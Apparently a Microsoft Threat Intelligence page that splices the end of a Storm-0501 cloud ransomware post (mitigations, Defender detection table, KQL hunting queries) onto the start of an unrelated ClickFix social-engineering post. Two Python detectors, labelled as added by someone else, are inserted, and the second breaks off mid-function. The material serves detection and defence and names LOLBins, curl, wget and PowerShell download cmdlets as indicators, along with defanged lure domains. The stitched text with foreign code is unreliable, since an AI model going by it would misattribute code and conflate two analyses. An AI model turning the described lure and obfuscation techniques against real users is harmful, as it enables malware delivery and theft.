If only Microsoft Entra ID performs MFA for a federated domain, set federatedIdpMfaBehavior to rejectMfaByFederatedIdp to prevent bypassing MFA CAPs.
Turn on Microsoft Entra ID protection to monitor identity-based risks and create risk-based Conditional Access policies to remediate risky sign-ins.
Protecting cloud resources
Use solutions like Microsoft Defender for Cloud to protect your cloud resources and assets from malicious activity, both in posture management, and threat detection capabilities.
Enable Microsoft Defender for Resource Manager as part of Defender for Cloud to automatically monitor the resource management operations in your organization. Defender for Resource Manager runs advanced security analytics to detect threats and alerts you about suspicious activity.
Enabling Defender for Resource Manager allows users to investigate Azure management operations within Microsoft Defender XDR, using the advanced hunting experience.
Utilize the Azure Monitor activity log to investigate and monitor Azure management events.
Utilize Azure policies for Azure Storage to prevent network and security misconfigurations and maximize the protection of business data stored in your storage accounts.
Enable Azure Monitor for Azure Blob Storage to collect, aggregate, and log data to enable recreation of activity trails for investigation purposes when a security incident occurs or the network is compromised.
Enable Azure Blob backup to protect from accidental or malicious deletions of blobs or storage accounts.
Apply the principle of least privilege when authorizing access to blob data in Azure Storage using Microsoft Entra and RBAC and configure fine-grained Azure Blob Storage access for sensitive data access through Azure ABAC.
Enable purge protection in Azure Key Vaults to prevent immediate, irreversible deletion of vaults and secrets. Use the default retention interval of 90 days.
Enable logs in Azure Key Vault and retain them for up to a year to enable recreation of activity trails for investigation purposes when a security incident occurs or the network is compromised.
Enable Microsoft Azure Backup for virtual machines to protect the data on your Microsoft Azure virtual machines, and to create recovery points that are stored in geo-redundant recovery vaults.
General hygiene recommendations
Utilize Microsoft Security Exposure Management, available in the Microsoft Defender portal, with capabilities such as critical asset protection and attack path analysis that enable security teams to proactively reduce exposure and mitigate the impact of Storm-0501 hybrid attack tactics. In this case, each of the critical assets involved – Entra Connect server, users with DCSync permissions, Global Administrators – can be identified by relevant alerts and recommendations.
Investigate on-premises and hybrid Microsoft Security Exposure Management attack paths. Security teams can use attack path analysis to trace cross-domain threats that exploit the critical Entra Connect server to pivot into cloud workloads, escalate privileges, and expand their reach. Teams can use the ‘Chokepoint’ view in the attack path dashboard in Microsoft Security Exposure Management to highlight entities appearing in multiple paths.
Utilize the Critical asset management capability in Microsoft Security Exposure Management by configuring your own custom queries to pinpoint your organization’s business-critical assets according to your needs, such as business-critical Azure Storage accounts.
Microsoft Defender XDR detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Tactic
Observed activity
Microsoft Defender coverage
Initial access
– Suspicious sign-ins
Microsoft Defender XDR – Authentication with compromised credentials – Compromised user account in a recognized attack pattern – Malicious sign in from a risky IP address – Malicious sign in from an IP address associated with recognized attacker infrastructure – Malicious sign in from recognized attacker infrastructure – Malicious sign-in from an unusual user agent – Malicious sign-in from known threat actor IP address – Successful authentication from a malicious IP – Successful authentication from a suspicious IP – Successful authentication using compromised credentials – User compromised through session cookie hijack – User signed in from a known malicious IP Address – Suspicious Azure sign-in by user with active session on a device involved in a credential theft attempt
Microsoft Defender for Identity – Possibly compromised user account signed in – Possibly compromised service principal account signed in
Microsoft Defender for Cloud Apps – Suspicious login from AADInternals tool
Microsoft Defender for Cloud (Defender for Resource Manager) – Suspicious invocation of a high-risk ‘Initial Access’ operation detected (Preview)
Microsoft Defender for Cloud (Defender for Storage) – Access from an unusual location to a storage account – Access from an unusual location to a sensitive blob container – Access from a known suspicious IP address to a sensitive blob container – Access from a suspicious IP address – Unusual unauthenticated public access to a sensitive blob container
Execution
– Various types of execution-related suspicious activity by an attacker were observed – Crafting access tokens and executing actions against the cloud
Microsoft Defender for Endpoint – Compromised account conducting hands-on-keyboard attack – Potential human-operated malicious activity – Suspicious cmdlets launch using AADInternals
Persistence
– Federated domain backdoor was added
Microsoft Defender for Cloud Apps – Backdoor creation using AADInternals tool
Privilege escalation
– Elevated access to Azure resources – Assignment of Owner Azure role
Microsoft Defender XDR – Suspicious Azure elevate access operation by a user with an active session on a device involved in a credential theft attempt – Possibly compromised Microsoft Entra Connect Sync account elevated its access to Azure resources – Possibly compromised user elevated access to Azure resources
Microsoft Defender for Cloud (Defender for Resource Manager) – Suspicious elevate access operation – Suspicious invocation of a high-risk ‘Privilege Escalation’ operation detected (Preview) – Suspicious Azure role assignment detected (Preview)
Defense evasion
– Attempts to tamper with Microsoft Defender Antivirus – Manipulation of Azure Storage account configurations
Microsoft Defender for Endpoint – Attempt to turn off Microsoft Defender Antivirus protection
Microsoft Defender for Cloud (Defender for Resource Manager) – Suspicious invocation of a high-risk ‘Defense Evasion’ operation detected (Preview)
Credential access
– Entra Connect Sync server compromise and sync accounts extraction – Extracting credentials from remote machines – Executing DCSync operation against a domain controller – Access Azure Storage accounts access keys – Creation of a key inside an Azure Key Vault for encryption of Azure Storage data
Microsoft Defender for Endpoint – Entra Connect Sync credentials extraction attempt – Indication of local security authority secrets theft – Potential Entra Connect Tampering – Ongoing hands-on-keyboard attack using Impacket toolkit – Possible source of DCSync attack
Microsoft Defender for Identity – Suspected DCSync attack (replication of directory services)
Microsoft Defender for Cloud Apps – Compromised Microsoft Entra ID Cloud Sync account – AADInternals tool used by a Microsoft Entra Sync account – Entra Connect Sync account suspicious activity following a suspicious login – Suspicious sign-in to Microsoft Entra Connect Sync account
Microsoft Defender for Cloud (Defender for Resource Manager) – Suspicious invocation of a high-risk ‘Credential Access’ operation detected (Preview)
Microsoft Defender for Cloud (Defender for Key Vault) – Suspicious key vault recovery detected – Unusual application accessed a key vault – Unusual operation pattern in a key vault – Unusual user accessed a key vault
Discovery
– Verifying whether Microsoft Defender for Endpoint is onboarded on a machine – Reconnaissance activity against Active Directory/Entra ID/Azure – AzureHound tool invocation in the cloud environment
Microsoft Defender for Endpoint – Suspicious sequence of exploration activities
Microsoft Defender for Cloud Apps – Suspicious use of AzureHound
Microsoft Defender for Identity – Reconnaissance tool was observed
Microsoft Defender for Cloud (Defender for Resource Manager) – AzureHound tool invocation detected
Lateral movement
– Lateral movement between endpoints in the network – Lateral movement using Evil-WinRM – Cloud sign-in attempts using stolen credentials or access tokens extracted from compromised endpoints
Microsoft Defender for Endpoint – Possibly malicious use of proxy or tunneling tool – Suspicious remote PowerShell execution
Microsoft Defender for Cloud Apps – Suspicious login from AADInternals tool
Exfiltration
– Data collection and theft from Azure Storage accounts
Microsoft Defender for Cloud (Defender for Resource Manager) – Suspicious invocation of a high-risk ‘Data Collection’ operation detected (Preview)
Microsoft Defender for Cloud (Defender for Storage) – The access level of a potentially sensitive storage blob container was changed to allow unauthenticated public access – Publicly accessible storage containers successfully discovered – Publicly accessible storage containers unsuccessfully scanned – Unusual amount of data extracted from a storage account – Unusual deletion in a storage account – Unusual amount of data extracted from a sensitive blob container – Unusual number of blobs extracted from a sensitive blob container – Unusual SAS token was used to access an Azure storage account from a public IP address – Suspicious external access to an Azure storage account with overly permissive SAS token – Suspicious external operation to an Azure storage account with overly permissive SAS token – Access from a suspicious IP address
Impact
– Mass Azure data store resources deletion and encryption
Microsoft Defender XDR – Suspicious Azure data store resources deletion attempt by a user with an active session on a device involved in a credential theft attempt
Microsoft Defender for Cloud (Defender for Resource Manager) – Suspicious backup resource deletion (Preview) – Suspicious invocation of a high-risk ‘Impact’ operation detected (Preview)
Microsoft Defender for Cloud (Defender for Storage) – Unusual deletion in a storage account
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender XDR
Microsoft Defender XDR customers can run the following queries to find related activity in their networks:
Sign-in activity
Explore sign-in activity from IdentityLogonEvents and look for uncommon behavior, such as sign-ins from newly seen IP addresses or sign-ins to new applications that are not sync-related:
IdentityLogonEvents
| where Timestamp > ago(30d)
| where AccountDisplayName contains "On-Premises Directory Synchronization Service Account"
| extend ApplicationName = tostring(RawEventData.ApplicationName)
| project-reorder Timestamp, AccountDisplayName, AccountObjectId, IPAddress, ActionType, ApplicationName, OSPlatform, DeviceType
The activity of the sync account is typically repetitive, coming from the same IP address to the same application. Any deviation from the natural flow is worth investigating. Cloud applications that are usually accessed by the Microsoft Entra ID sync account are Microsoft Azure Active Directory Connect, Windows Azure Active Directory, and Microsoft Online Syndication Partner Portal.
Cloud activity
Explore the cloud activity (ActionType) of the sync account. Similar to sign-in activity, this account by nature performs a fixed set of actions, including "update User.", "update Device.", and so on. New and uncommon activity from this user might indicate interactive use of the account, which could be a legitimate action by someone in the organization or a malicious action by the threat actor.
CloudAppEvents
| where Timestamp > ago(30d)
| where AccountDisplayName has "On-Premises Directory Synchronization Service Account"
| extend Workload = RawEventData.Workload
| project-reorder Timestamp, IPAddress, AccountObjectId, ActionType, Application, Workload, DeviceType, OSPlatform, UserAgent, ISP
Pay close attention to actions from different DeviceTypes or OSPlatforms: this account’s automated service runs from one specific machine, so there shouldn’t be any variety in these fields.
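A baseline-deviation check for the sync account that serves both queries above, added here as an illustration and not Microsoft’s code: it learns the IP addresses, applications, platforms, device types and action types seen during a known-good period from constructed rows shaped like the projected columns, then flags recent rows that introduce a new value or touch a non-sync application. The row values are constructed sample data; the expected application names are the three listed in the text.

```python
from collections import defaultdict

# Applications the text lists as normally accessed by the Microsoft Entra ID sync account.
EXPECTED_APPS = {
    "Microsoft Azure Active Directory Connect",
    "Windows Azure Active Directory",
    "Microsoft Online Syndication Partner Portal",
}
# Columns carried by the IdentityLogonEvents / CloudAppEvents rows projected above;
# ApplicationName follows the extend() used in the sign-in query.
BASELINE_FIELDS = ("IPAddress", "ApplicationName", "OSPlatform", "DeviceType", "ActionType")


def build_baseline(rows):
    """Record every value seen per field during a known-good period."""
    baseline = defaultdict(set)
    for row in rows:
        for field in BASELINE_FIELDS:
            if row.get(field) is not None:
                baseline[field].add(row[field])
    return baseline


def find_deviations(baseline, rows):
    """Return [(row, reasons)] for rows that break the account's routine: a value
    never seen in the baseline, or an application that is not sync-related."""
    flagged = []
    for row in rows:
        reasons = [f"new {field}: {row[field]}"
                   for field in BASELINE_FIELDS
                   if row.get(field) is not None and row[field] not in baseline[field]]
        app = row.get("ApplicationName")
        if app is not None and app not in EXPECTED_APPS:
            reasons.append(f"non-sync application: {app}")
        if reasons:
            flagged.append((row, reasons))
    return flagged


# Constructed rows (not real telemetry). The sync account normally signs in from one
# server address to the Entra Connect applications and only updates users and devices.
BASELINE_ROWS = [
    {"IPAddress": "203.0.113.10", "ApplicationName": "Microsoft Azure Active Directory Connect",
     "OSPlatform": "Windows", "DeviceType": "Server", "ActionType": "LogonSuccess"},
    {"IPAddress": "203.0.113.10", "ApplicationName": "Windows Azure Active Directory",
     "OSPlatform": "Windows", "DeviceType": "Server", "ActionType": "Update user."},
    {"IPAddress": "203.0.113.10", "ApplicationName": "Windows Azure Active Directory",
     "OSPlatform": "Windows", "DeviceType": "Server", "ActionType": "Update device."},
]
RECENT_ROWS = [
    # Routine sync run: every value is already in the baseline, so it is not flagged.
    {"IPAddress": "203.0.113.10", "ApplicationName": "Windows Azure Active Directory",
     "OSPlatform": "Windows", "DeviceType": "Server", "ActionType": "Update user."},
    # Interactive use from an unfamiliar address and platform against a non-sync app.
    {"IPAddress": "198.51.100.7", "ApplicationName": "Azure Portal",
     "OSPlatform": "Linux", "DeviceType": "Other", "ActionType": "LogonSuccess"},
]

if __name__ == "__main__":
    for row, reasons in find_deviations(build_baseline(BASELINE_ROWS), RECENT_ROWS):
        print(row["IPAddress"], "->", "; ".join(reasons))
```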
Azure management events
Explore Azure management events by querying the new CloudAuditEvents table in advanced hunting in the Defender portal. The OperationName column indicates the type of control-plane event executed by the user.
Explore Microsoft Security Exposure Management capabilities by querying the ExposureGraphNodes and ExposureGraphEdges tables in advanced hunting in the Defender portal. By utilizing these tables, you can identify critical assets, including Azure Storage accounts that contain sensitive data or are protected by an immutable storage policy. All predefined criticality rules can be found here: Predefined classifications
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Over the past year, Microsoft Threat Intelligence and Microsoft Defender Experts have observed the ClickFix social engineering technique growing in popularity, with campaigns targeting thousands of enterprise and end-user devices globally every day. Since early 2024, we’ve helped multiple customers across various industries address such campaigns attempting to deliver payloads like the prolific Lumma Stealer malware. These payloads affect Windows and macOS devices and typically lead to information theft and data exfiltration.
The ClickFix technique attempts to trick users into running malicious commands on their devices by taking advantage of their target’s tendency to solve minor technical issues and other seemingly benign interactions, such as human verification and CAPTCHA checks. It typically gives the users instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Windows Terminal, or Windows PowerShell. It’s often combined with delivery vectors such as phishing, malvertising, and drive-by compromises, most of which even impersonate legitimate brands and organizations to further reduce suspicion from their targets.
Because ClickFix relies on human intervention to launch the malicious commands, a campaign that uses this technique could get past conventional and automated security solutions. Organizations could thus reduce the impact of this technique by educating users in recognizing its lures and by implementing policies that will harden the device configurations in their environment (for example, disallowing users to use the Run dialog if it’s not necessary in their daily tasks). Microsoft Defender XDR also provides a comprehensive set of protection features that detect this threat at various stages of the attack chain.
This blog discusses the different elements that make up a ClickFix campaign—from the arrival vectors it comes with to its various implementations—and provides different examples of threat campaigns we’ve observed to further illustrate these elements. We also provide recommendations and detection details to surface and mitigate this threat.
A typical ClickFix attack begins with threat actors using phishing emails, malvertisements, or compromised websites to lead unsuspecting users to a visual lure—usually a landing page—and trick them into executing a malicious command themselves. By adding this user interaction element in the attack chain, a threat using the ClickFix technique could slip through conventional and automated security solutions.
Microsoft Threat Intelligence observed threat actors adapting and improving certain elements of the technique to further evade detection. For example, threat actors obfuscate the JavaScript that generates the visual lures or they download parts of the code from different servers. They also employ various tactics in obfuscating malicious commands. We discuss these stages of the attack chain in detail in the succeeding sections of this blog.
Once the malicious command is run by the user, malware is downloaded to the target device. We've observed numerous threat actors leveraging ClickFix attacks to deliver the following:
Infostealers like LummaStealer, which appears to be the most prolific ClickFix final payload based on our observations and threat hunting investigations
Remote access tools (RATs) such as Xworm, AsyncRAT, NetSupport, and SectopRAT, which could allow threat actors to conduct hands-on keyboard activity like discovery, lateral movement, and persistence
Loaders like Latrodectus and MintsLoader, which could deliver additional malware and other payloads
Rootkits, such as a modified version of the open source r77, which could allow threat actors to employ several sophisticated persistence and defense evasion tactics and remain deeply embedded in a victim system
These final payloads are often “fileless”, that is, they’re seldom written to disk as a Windows executable (.exe or .dll) file. Instead, they’re loaded and launched in memory by living-off-the-land binaries (LOLBins), often as a .NET assembly or Common Language Runtime (CLR) module. However, whether the malware is on disk or in memory, we’ve observed its code injected into LOLBins, such as msbuild.exe, regasm.exe, or powershell.exe.
Figure 1. The typical ClickFix attack chain
Case study: Lampion malware campaign
To illustrate a typical ClickFix attack chain, let's look at a campaign we first identified in May 2025 targeting Portuguese organizations in the government, finance, and transportation sectors to deliver Lampion malware, an infostealer focused on banking information. This campaign has since been observed in several countries, including Portugal, Switzerland, Luxembourg, France, Hungary, and Mexico, targeting organizations in the government, education, transportation, and financial services industries. As of June 2025, this campaign remains active.
The Lampion malware campaign’s ClickFix lures, obfuscation methods, and multi-stage infection process are designed to evade detection:
The threat actor sends phishing emails containing a ZIP file, which when opened, contains an HTML file that redirects target users to a fake Portuguese tax authority site where the ClickFix lure is hosted.
The ClickFix lure tricks users into launching a PowerShell command that downloads an obfuscated VBScript (.vbs).
The downloaded script then writes a second obfuscated .vbs file to the Windows %TEMP% directory and schedules it to run later using a hidden task.
This second .vbs file downloads a third and much larger .vbs file that performs reconnaissance, checks for antivirus or sandbox environments, and sends system data to a command-and-control (C2) server.
The third script also creates a .cmd file in the Windows startup folder, naming it after the user’s hostname, and schedules a system restart.
After the device restarts, the .cmd file launches a large DLL through rundll32.exe and attempts to deliver the final payload.
However, during our investigation, the actual Lampion malware wasn’t delivered because the download command was commented out of the code.
Figure 2. Lampion infection chain
Before the click: Arrival vectors
Threat actors leveraging ClickFix rely on a variety of methods to lure unwitting users. We’ve observed three primary avenues where a user could encounter a ClickFix prompt: by receiving phishing emails, encountering a malicious ad, or by visiting a compromised or malicious website.
Phishing
Microsoft Threat Intelligence first observed the use of the ClickFix technique between March and June 2024 in email campaigns sent by a threat actor we track as Storm-1607. These emails contained HTML attachments that attempted to install DarkGate, a commodity loader that is capable of keylogging, cryptocurrency mining, establishing C2 communications, and downloading additional malicious payloads, among others.
One of Storm-1607’s campaigns observed in May 2024 consisted of tens of thousands of emails targeting organizations in the United States (US) and Canada. These emails used payment and invoice lures and contained attachments with file names like reports_528647.html:
Figure 3. Storm-1607 phishing email
When opened, the HTML loaded a page with a fake Microsoft Word new document image and a dialog box showing an error message and prompting the user to click the How to fix button:
Figure 4. HTML attachment displaying a Microsoft Word background and ClickFix lure
Clicking the button copied the malicious code to the user's clipboard in the background. Meanwhile, the dialog box added new instructions that explained to the user how to open Windows Terminal and paste the malicious code into it:
Figure 5. ClickFix lure displaying further instructions
While other threat actors also use invoice or payment lures in their phishing campaigns, as of this writing, including HTML attachments in the emails is no longer the preferred method to implement the ClickFix technique. Instead, threat actors now include in their phishing email a URL that points to a ClickFix landing page. For example, in March 2025, we observed a threat actor tracked as Storm-0426 launch a campaign consisting of thousands of phishing emails that targeted users in Germany and attempted to install MintsLoader. The emails used payment and invoice lures purportedly from a web hosting provider and contained URLs leading to the Prometheus traffic direction system (TDS) hosted on numerous compromised sites:
Figure 6. Storm-0426 phishing email
The TDS redirected users to the attacker-controlled website mein-lonos-cloude[.]de, where the ClickFix technique instructed the users to complete a human verification process by following the displayed instructions, which launched malicious code:
Figure 7. ClickFix landing page
Another example of a phishing campaign using URLs and redirectors was observed in June 2025, where the campaign impersonated the US Social Security Administration (SSA) and used a combination of social engineering and domain spoofing to deliver ScreenConnect, a legitimate remote management tool that has become increasingly abused by threat actors. Once installed, ScreenConnect could give an attacker full remote control over a victim’s system, enabling them to exfiltrate data, install additional malware, or conduct surveillance.
The campaign began with emails sent from a legitimate but compromised Brazilian domain. The message, which even included legitimate links to SSA's official social media accounts in the footer, claimed that there was an issue with the recipient's social security statement. Like other phishing emails, these characteristics and tactics were all attempts by the threat actor to bypass spam filters, lend credibility to the message and reduce suspicion, and prompt the user to take immediate action:
Figure 8. Phishing email impersonating the US SSA
The message's call-to-action button, labeled Download Statement, was also particularly deceptive: instead of linking directly to a malicious site, it used a Google Ads URL redirect to obscure the final destination. This technique not only helped the email pass through conventional email security solutions, it also undermined a practice users are typically taught in security awareness training (hovering over links before clicking to check whether the displayed URL points to the intended site).
When a user clicked the Download Statement button, they were redirected to a spoofed SSA website hosted on a Spanish top-level domain (access-ssa-gov[.]es). The site closely mimicked the real SSA home page, including a blurred background image of the legitimate site to create a false sense of familiarity and trust:
Figure 9. ClickFix landing page impersonating the US SSA
The landing page presented the user with a CAPTCHA human verification pop-up, which was part of the ClickFix technique. Behind the scenes, this interaction triggered a series of fake verification steps designed to guide the user into running a PowerShell script that would eventually download and launch the ScreenConnect payload:
Figure 10. ClickFix instructions from the spoofed US SSA domain
Malvertising
Malvertising is another popular delivery method that leads to ClickFix landing pages. In a campaign observed in April 2025, users who attempted to stream free or pirated movies on certain websites inadvertently launched a variety of scam pages in a new browser tab when they interacted with a movie (for example, by pressing the play button):
Figure 11. Example of a free movie streaming website
One of these scam pages was a ClickFix landing page that downloaded and installed Lumma Stealer:
Figure 12. ClickFix landing page the users were redirected to if they clicked the “Play” button on the free movie website
This activity cluster is notable because it renamed the various intermediate HTA scripts to media format extensions such as .mp3, .mp4, or .ogg. It’s also notable for its high traffic volumes: in a single day, tens of thousands, if not hundreds of thousands, of unique visitors could be funneled to scam pages (including the ClickFix landing page) through the malvertising redirectors.
Drive-by compromise
Some threat actors have also been observed to leverage compromised websites to deliver the ClickFix landing page. For example, the threat actor we track as Storm-0249 has traditionally used email to deliver Latrodectus or other initial access malware—whether by using PDF files or URL links (sometimes copyright infringement-themed). However, since the beginning of March 2025, Storm-0249 switched to compromising legitimate websites, potentially through WordPress vulnerabilities, and using the ClickFix technique to deliver its payloads.
When a user visits the compromised site, the original page is briefly displayed before it’s replaced with the ClickFix human verification lure. This specific lure even spoofs Cloudflare to further trick users into thinking that the verification step is legitimate:
Figure 13. ClickFix lure spoofing Cloudflare Turnstile on a compromised site
Inside the click: ClickFix implementations
ClickFix operators use several methods to attempt to convince a target to perform user-level command execution on their system. Early landing pages mimicked Google's "Aw, Snap!" crash error or a Word Online "extension missing" message (as depicted in Figure 4), while recent ones spoof Google's reCAPTCHA and Cloudflare's Turnstile solution. We've even observed threat actors spoof social media platforms like Discord to trick users into believing they're joining an actual Discord server. Many elements go into building ClickFix lure pages, from HTML inline frames (iframes) and href references to cascading style sheets (CSS) resources and the JavaScript that drives them, to make them look more legitimate.
There are various ways that ClickFix is implemented: some implementations are contained in one file or page, while others use remote resources. Some threat actors leave code comments amateurishly while others obfuscate their code. There are even implementations that report the status of an infection to a Telegram channel or a web server. We provide a few examples of these implementations and discuss their inner workings.
Impersonating Cloudflare Turnstile
Figure 14 shows a partial screenshot of a ClickFix landing page, binancepizza[.]info, displaying a seemingly legitimate Cloudflare Turnstile verification process that a user is lured to interact with before they can supposedly access the site:
Figure 14. The ClickFix landing page binancepizza[.]info
Its HTML source code clones this Cloudflare Turnstile-style page using an href attribute that points to a CSS resource hosted by the Font Awesome library:
Figure 15. HTML code highlighting a CSS resource for a Cloudflare verification prompt
The page also references an HTML file (field.html) using a hidden iframe:
Figure 16. HTML code highlighting hidden iframe and text needing to “verify”
Within field.html, we see in Figure 17 that contentEl is the iframe element representing the fake Cloudflare Turnstile verification check box. When a user ticks the Verify you are human check box, this script animates a fake spinner through runVerification() and sends postMessage("trigger") to the parent window (the main landing page).
Figure 17. JavaScript code of iframe field.html, highlighting elements that send a trigger message upon verification click
The user is then presented with the ClickFix instructions (Figure 18), while the obfuscated command is copied to the user’s clipboard (Figure 19):
Figure 18. ClickFix instructions from binancepizza[.]info
Figure 19. Malicious command copied to clipboard
Figure 20 shows that the clipboard copy occurs once the code receives the message “trigger”, which is sent by the field.html hidden iframe. Once that message is received, the script uses navigator.clipboard.writeText(codeToCopy) to copy the command to the clipboard.
Figure 20. JavaScript code highlighting the method navigator.clipboard.writeText, which copies a malicious command to clipboard
Impersonating social platforms
It’s important to note that not all ClickFix landing pages are designed in the same manner and might not strictly contain the elements discussed previously. In some instances, threat actors also mimic popular social platforms to broaden their reach of potential targets.
Figure 21 shows a ClickFix landing page spoofing a Discord server supposedly needing to verify a user before they can join:
Figure 21. Fake Discord server landing page implementing ClickFix.
In this page's source code (Figure 22), we can see it referencing the Discord logo image file to appear legitimate. Additionally, the addEventListener method waits for the Verify button to get clicked (through verifyBtn) so that navigator.clipboard.writeText(command) can copy the malicious command to the user's clipboard. This method is part of the asynchronous Clipboard API, which gives web pages access to the operating system (OS) clipboard. Older pages might use document.execCommand("copy"), which is now deprecated.
The fake Discord landing page differs from the previous example because it doesn't rely on an external trigger (from the hidden iframe). Instead, the click-then-copy logic is processed entirely in the main window. Based on our analysis, this landing page also appears to be part of the OBSCURE#BAT campaign delivering the r77 rootkit.
Figure 22. HTML code highlighting use of Discord logo and JavaScript elements that copy a malicious command to clipboard upon clicking “verify”
The “fix”: User-level code execution
The ClickFix technique typically presents its "fix" by instructing users to run malicious commands or code in the Windows Run dialog box. We assess that the threat actors who use this technique are banking on the idea that most of their targets aren't familiar with this Windows OS component and what it's used for, unlike the more advanced users who perform system administration tasks. Early ClickFix lures instructed users to run commands manually and directly in Windows Terminal or Windows PowerShell. However, the warning that Windows Terminal displays when multi-line text is pasted might have deterred potential victims from running these commands, leading the threat actors to change their tactics.
Figure 23. Example of a multi-line paste warning in Windows Terminal
Detecting Windows Run dialog misuse
The Windows Run dialog (Win + R) is a trusted shell input user interface (UI) that's part of Windows Explorer (explorer.exe). Internally, it uses the ShellExecute or CreateProcess APIs to resolve and launch commands. The input is limited to MAX_PATH, a null-terminated string (\0) buffer with a practical maximum of 259 characters. Additionally, as part of the Run dialog, Windows loads the tiptsf.dll module into explorer.exe. This DLL is related to the Text Services Framework (TSF), which provides the text input processor interface.
Figure 24. The Windows Run dialog box
Entering commands into the Run dialog leaves forensic traces, most notably in the RunMRU (Most Recently Used) registry key at HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. Each executed command is stored as a string value (named a, b, c, and so on) ending in a "\1" suffix, with the MRUList value recording their order. This key keeps a history of Run dialog executions and can be used to reconstruct user-initiated activity during investigations. Note that it doesn't create a registry entry if the process execution fails.
Figure 25. RunMRU registry key entry with a malicious ClickFix command
To determine whether a ClickFix command execution is potentially occurring in the environment, check whether the RunMRU entries include signs pointing to LOLBins, such as powershell, mshta, rundll32, wscript, curl, and wget, that can execute code and/or download payloads. PowerShell continues to be the most leveraged native binary, with cmdlets and aliases such as iwr (Invoke-WebRequest), irm (Invoke-RestMethod), and iex (Invoke-Expression) being very prolific.
Additional suspicious elements to check in entries within the RunMRU registry key include the following:
First-stage payloads are often hosted on direct IP addresses, content delivery network (CDN) domains, unusual top-level domains (for example, .live, .shop, .icu), or code-sharing and paste platforms.
First-stage payloads are often delivered and/or launched as specific file types such as .html, .hta, .txt, .zip, .msi, .bat, .ps1, or .vbs.
The file type of the scripts might be renamed to media extensions (such as .png, .mp3, .mp4, .wav, and .jpg) to hide their true intent.
The file type might employ double file extension for evasion (for example, file.hta.mp4)
URLs are often shortened using shorteners such as Bitly.
A fake reCAPTCHA, CAPTCHA, or Turnstile confirmation is included, such as the following:
✅ “I am not a robot – reCAPTCHA Verification ID: XXXX”
# # I am not a robot: CAPTCHA Verification UID: XXXX\
# “Human, not a robot: CAPTCHA: Verification ID: XXXX”
✔️ “Cloud identificator:XXXX”
Figure 26. Examples of generic ClickFix commands
Obfuscation and execution techniques for defense evasion
The command examples in the previous section aren’t all encompassing, as we’ve observed threat actors employing a growing number of obfuscation and execution techniques for defense evasion. These techniques include nested execution chains, proxy command abuse, encoding schemes such as Base64, use of string concatenation/fragmentation, and escaped characters, among others.
Figure 27. Example of a ClickFix command using nested PowerShell, string obfuscation through concatenated ampersand ("&") delimiters, and a benign-sounding phrase (for example, "Microsoft Defender Services Secure Access")
Figure 28. Example of a ClickFix command using LOLBin stacking (repeated cmd.exe) and obfuscation through escape characters (^)
Figure 29. Example of a ClickFix command obfuscated using string splitting and concatenation, indexed character access through the $1 command string, and ampersand execution
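The following Python script is an added example, not code from this blog: it applies the RunMRU checklist from the previous section and undoes two of the obfuscation techniques just described (cmd.exe caret escapes and a PowerShell -EncodedCommand Base64 argument) before scoring an entry against the LOLBin, cmdlet, hosting, extension, shortener, and fake-CAPTCHA indicators. It assumes input in the raw form Explorer stores under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU (value data ending in "\1", as the hunting query later in this post also expects). The IP addresses, domains, and commands in SAMPLES are constructed for the example and are not observed indicators.

```python
"""Triage Windows Run dialog history (RunMRU) values for ClickFix indicators.

Added example. Input is assumed to be raw RunMRU value data as stored under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU
(Explorer appends "\\1" to every entry). SAMPLES below are constructed.
"""
import base64
import binascii
import re

# Checklist items from the blog: LOLBins, download/execute cmdlets, hosting
# patterns, file extensions, shorteners, and fake-CAPTCHA confirmation strings.
LOLBINS = ("powershell", "pwsh", "mshta", "rundll32", "wscript", "cscript",
           "curl", "wget", "msiexec", "bitsadmin", "forfiles", "certutil")
DOWNLOAD_EXEC = ("iwr", "irm", "iex", "invoke-webrequest", "invoke-restmethod",
                 "invoke-expression", "downloadstring", "downloadfile",
                 "frombase64string", "-useb", "usebasicparsing")
SUSPICIOUS_TLDS = ("live", "shop", "icu")
SCRIPT_EXTS = ("hta", "ps1", "vbs", "bat", "cmd", "js", "msi", "zip", "html", "txt")
MEDIA_EXTS = ("png", "jpg", "mp3", "mp4", "wav", "ogg")
SHORTENERS = ("bit.ly", "tinyurl.com", "t.ly")  # assumption: a few common shortener hosts
CAPTCHA_MARKERS = ("not a robot", "captcha", "verification id", "verification uid",
                   "cloud identificator", "\u2705", "\u2714")

URL_RE = re.compile(r"https?://([^\s/\"'<>]+)", re.I)
IP_HOST_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Same shape as the blog's KQL regex: -e / -ec / -enc / -EncodedCommand then Base64.
ENC_RE = re.compile(r"[-/][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\s+([A-Za-z0-9+/=]{15,})")
DOUBLE_EXT_RE = re.compile(r"\.(?:%s)\.(?:%s)\b" % ("|".join(SCRIPT_EXTS), "|".join(MEDIA_EXTS)))
SCRIPT_EXT_RE = re.compile(r"\.(?:%s)\b" % "|".join(SCRIPT_EXTS))
MEDIA_EXT_RE = re.compile(r"\.(?:%s)\b" % "|".join(MEDIA_EXTS))


def normalize(value):
    """Strip the RunMRU "\\1" terminator and undo cmd.exe caret escaping (^x -> x)."""
    if value.endswith("\\1"):
        value = value[:-2]
    return re.sub(r"\^(.)", r"\1", value)


def decode_encoded_command(cmd):
    """Decode a PowerShell -EncodedCommand argument (Base64 of UTF-16LE text), else None."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    b64 = m.group(1)
    try:
        data = base64.b64decode(b64 + "=" * (-len(b64) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None
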